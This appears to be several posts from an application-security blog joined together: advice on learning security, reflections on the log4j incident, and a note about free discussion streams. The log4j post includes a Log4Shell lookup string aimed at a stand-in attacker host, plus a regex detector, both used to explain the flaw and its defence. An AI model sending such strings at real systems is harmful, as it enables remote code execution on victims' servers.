Below is a long list of ways that you can continue your learning. If you have more ideas, please send them to me and I will add them!
Find what you are interested in. Join communities (online and local, if possible) that focus on those topics. Make friends if you can!
Finding out what you are interested in might take a lot of time, that’s okay! It took me 2 years to figure out I wanted to do AppSec, not PenTesting. You need to find the right place for you.
If you fear that you are too old to learn, please put that notion aside. You CAN learn. If this belief is holding you back, talk to someone who cares about you, and let them talk you out of it. Everyone has doubts sometimes, people who love you can help you look past them.
Find out if there are learning opportunities at work. Sometimes you can job shadow someone or help on certain projects. I kept volunteering to help the security team at my office and eventually they let me join the team!
Some organizations offer coaching services to employees. Usually it’s for leadership, but I used to work somewhere as an AppSec coach. I trained up the junior people into AppSec pros; it was great!
If your office pays to bring in a trainer, it’s often significantly less costly than sending them all individually to courses. See if you can join forces with other teams, departments, or even other organizations to create a larger budget.
Ideally you will aim to learn about best practices that are agnostic in nature, and then also learn about your specific tech stack that you use at work. This could mean a general secure coding course, with a break-out session on your specific programming language, framework, cloud provider, etc.
If you are on the security team and you are planning to train your developers on security for the first time, and anyone seems nervous, you might want to assure them that no one is losing their job. It might sound strange, but sometimes when there’s change, people worry. If you can remove their worries, they will learn more, and hopefully even enjoy it. Watch for this and reassure people if the need arises.
If you are planning learning for others, communicate your plan, in advance. Let them know what’s coming. It helps people prepare themselves, and you are likely to get better results.
If possible, provide training in multiple formats (audio, visual/diagrams/images, hands on, written, etc.) so that every person’s learning style is accommodated. If you’re not sure how you learn, try a few different ways and see which one “feels right”. That’s likely the best one for you!
Give yourself short breaks. A microbreak (5-15 seconds to laugh at a meme or read a few short posts on Mastodon) can help you move information from your short-term memory into long-term memory, meaning you are more likely to be able to apply what you learned, and remember it for significantly longer.
Take tests or give yourself tests. Not so that you can see how you measure up against others, but to make yourself remember the things you’ve learned. Practising ‘recall’ will help ensure you’ve learned (not memorized) the new information.
Set time aside for yourself each day and slowly watch recorded conference talks and other content that is of interest to you. Consuming information in smaller chunks can make it easier to absorb. If you aren’t sure which videos, books, or articles you want to start with, ask for suggestions from people in your community.
Application Security Learning Opportunities:
Please start with the free training inside We Hack Purple Community. There are articles, events, and formal courses you can follow, and all of it is free! Start with the class ‘Application Security Foundations Level 1’ if you are new to this topic.
Most AppSec vendors will give you a workshop for free if their product is expensive/enterprise. ASK for a workshop for your team, for free. They might say no. If they do, tell them their competitor offers it (because this is true in most cases). Sometimes this works! If it doesn’t work, find out if you can add the cost of training onto the licensing agreement.
I haven’t written in my personal blog in a while, and I have good reasons (I moved to a new city, the new place will be a farm, I restarted my international travel, something secret that I can’t announce yet, and also did I mention I was a bit busy?). But I still can’t get over log4j (see previous article 1, article 2, and the parody song). The sheer volume of work involved in the response was spectacular (one company estimated 100 weeks of work, completed over the course of 8 days), and the damage caused is still unknown at this point. We will likely never know the true extent of the cost of this vulnerability. And this bugs me.
I met up last month with a bunch of CISOs and incident responders, to discuss the havoc that was this zero-day threat. What follows are stories, tales, facts and fictions, as well as some of my own observations. I know it’s not the perfect storytelling experience you are used to here; bear with me, please.
Short rehash: log4j is a popular Java library used for application logging. A vulnerability was discovered in it that allowed anyone to paste a short string of characters into the address bar (or any other input that gets logged), and if the application was vulnerable, the attacker would gain remote code execution (RCE). No authentication to the system was required, making this the simplest attack of all time to gain the highest possible level of privilege on the victim’s system. In summary: very, very scary.
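The root problem, roughly, was that log4j expanded `${...}` lookups found anywhere in a log message, including in attacker-controlled input. Here is a deliberately simplified Python sketch of that behaviour; the `resolve_lookup` function and its output are invented stand-ins, since the real JNDI lookup actually fetched and executed remote code:

```python
import re

def resolve_lookup(expr: str) -> str:
    # In log4j, a "jndi:ldap://..." lookup triggered a network fetch of
    # attacker-controlled code. Here we only simulate the danger.
    if expr.startswith("jndi:"):
        return "<!! remote code fetched from " + expr[5:] + " !!>"
    return expr

def log(message: str) -> str:
    # Expanding lookups inside the *data* being logged (not just a
    # trusted format string) is what made any logged user input,
    # like an HTTP header, a potential attack vector.
    return re.sub(r"\$\{([^}]*)\}", lambda m: resolve_lookup(m.group(1)), message)

user_agent = "${jndi:ldap://attacker.example/a}"  # attacker-supplied header
print(log("User-Agent was: " + user_agent))
```

The fix in log4j was, in essence, to stop performing these lookups on message data; the sketch shows why logging a single untrusted string was enough to be exploited.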
Most companies had no reason to believe they had been breached, yet they pulled together their entire security team and various other parts of their org to fight against this threat, together. I saw and heard about a lot of teamwork. Many people I spoke to told me they had their security budgets increased many times over, being able to hire several extra people and buy new tools. I was told “Never let a good disaster go to waste”, interesting….
I read several articles from various vendors claiming that they could have prevented log4j from happening in the first place, and for some of them it was true, though for many it was just marketing falsehoods. I find it disappointing that any org would publish an outright lie about the ability of their product, but unfortunately this is still common practice for some companies in our industry.
I happened to be on the front line at the time, doing a 3-month full-time stint (while still running We Hack Purple). I had *just* deployed an SCA tool that confirmed for me that we were okay. Then I found another repo. And another. And another. In the end they were still safe, but finding out there had been 5 repos full of code, that I was unaware of as their AppSec Lead, made me more than a little uncomfortable, even if it was only my 4th week on the job.
I spoke to more than one individual who told me they didn’t have log4j vulnerabilities because the version they were using was SO OLD they had been spared, and still others who said none of their apps did any logging at all, and thus were also spared. I don’t know about you, but I wouldn’t be bragging about that to anyone…
For the first time ever, I saw customers not only ask if vendors were vulnerable, but they asked “Which version of the patch did you apply?”, “What day did you patch?” and other very specific questions that I had never had to field before.
I heard about several vendors whose customers demanded “Why didn’t you warn us about this? Why can’t your xyz tool prevent this?” when in fact their tool had nothing to do with libraries, and it was therefore not at all in the scope of the tool. This tells me that customers were quite frightened. I mean, I certainly was….
Several organizations had their incident response process TESTED for the first time. Many of us realized there were improvements to make, especially when it comes to giving updates on the status of the event. Many people learned to improve their patching process. Or at least I hope they did.
Those that had a WAF, RASP, or CDN were able to throw up some fancy regex and block most requests. Not a perfect or elegant solution, but it saved quite a few companies’ bacon and greatly reduced the risk.
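For a feel of what those emergency rules looked like, here is a minimal sketch in Python. This is an illustration only, not a real WAF rule: the deployed rules were far more thorough, and attackers quickly found obfuscations (nested lookups, encodings) that simple patterns like this one miss, which is exactly why regex blocking was a stopgap rather than a fix:

```python
import re

# Simplified version of the kind of pattern vendors pushed out to block
# Log4Shell exploit strings: a "${" followed by "jndi" or by another
# nested "${" lookup (a common obfuscation, e.g. ${${lower:j}ndi:...}).
LOG4SHELL_PATTERN = re.compile(r"\$\{\s*(jndi|\$\{)", re.IGNORECASE)

def looks_like_log4shell(value: str) -> bool:
    """Return True if the input resembles a Log4Shell lookup string."""
    return bool(LOG4SHELL_PATTERN.search(value))

print(looks_like_log4shell("${jndi:ldap://attacker.example/a}"))  # True
print(looks_like_log4shell("${${lower:j}ndi:rmi://x/y}"))         # True
print(looks_like_log4shell("normal search query"))                # False
```

Blocking at the edge like this bought teams time to do the real work: finding every affected app and upgrading the library.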
I’ve harped on many clients and students before that if you can’t do quick updates to your apps, that is a vulnerability in itself. Log4j proved this like never before. I’m not generally an “I told you so” type of person. But I do want to tell every org “Please prioritize your ability to patch and upgrade frameworks quickly; this is ALWAYS important and valuable as a security activity. It is a worthy investment of your time.”
Again, I apologize for this blog post being a bit disjointed. I wasn’t sure how to string so many different thoughts and facts into the same article. I hope this was helpful.
All of the streams are free, and I would love to have you join us live! If you can’t make it live, you can watch them after on my YouTube Channel, or download them via a podcast app by looking for the podcast “Alice and Bob Learn” (which will be launched right after the first stream).
Ideally, you will read the chapter before the corresponding live discussion, but if you don’t, that’s okay. You will still learn, and you are definitely welcome to attend. 😀